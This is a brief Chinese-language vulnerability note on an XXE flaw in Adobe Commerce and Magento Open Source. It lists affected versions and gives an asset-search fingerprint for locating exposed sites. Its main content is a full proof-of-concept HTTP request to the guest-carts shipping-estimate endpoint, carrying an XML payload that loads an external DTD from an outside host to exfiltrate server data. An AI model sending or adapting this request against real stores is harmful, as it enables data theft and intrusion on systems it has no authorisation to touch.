Magento Open Source存在xxe漏洞
一、漏洞描述
<font style="color:rgb(38, 38, 38);"> Magento Open Source是一款免费的电子商务平台,由Adobe公司开发和维护。它是基于PHP语言和Zend Framework构建的,提供了强大和灵活的电子商务解决方案。 Adobe Commerce和Magento Open Sourc多个版本存在xxe漏洞,恶意攻击者可能通过该漏洞构造精心的XML文档执行命令。 </font>
二、影响版本
Adobe Commerce <= 2.4.7
Adobe Commerce <= 2.4.6-p5
Adobe Commerce <= 2.4.5-p7
Adobe Commerce <= 2.4.4-p8
Adobe Commerce <= 2.4.3-ext-7
Adobe Commerce <= 2.4.2-ext-7
Adobe Commerce <= 2.4.1-ext-7
Adobe Commerce <= 2.4.0-ext-7
Adobe Commerce <= 2.3.7-p4-ext-7
Magento Open Source <= 2.4.7
Magento Open Source <= 2.4.6-p5
Magento Open Source <= 2.4.5-p7
Magento Open Source <= 2.4.4-p8
三、资产测绘
app="Adobe-Magento"
四、漏洞复现
POST /rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods HTTP/2
Host:
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/json
Content-Length: 274
{
"address": {
"totalsReader": {
"collectorList": {
"totalCollector": {
"sourceData": {
"data": "<?xml version=\"1.0\" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"http://oryccaxtmo.dgrh3.cn/dtd.xml\"> %sp; %param1; ]> <r>&exfil;</r>",
"options": 16
}
}
}
}
}
}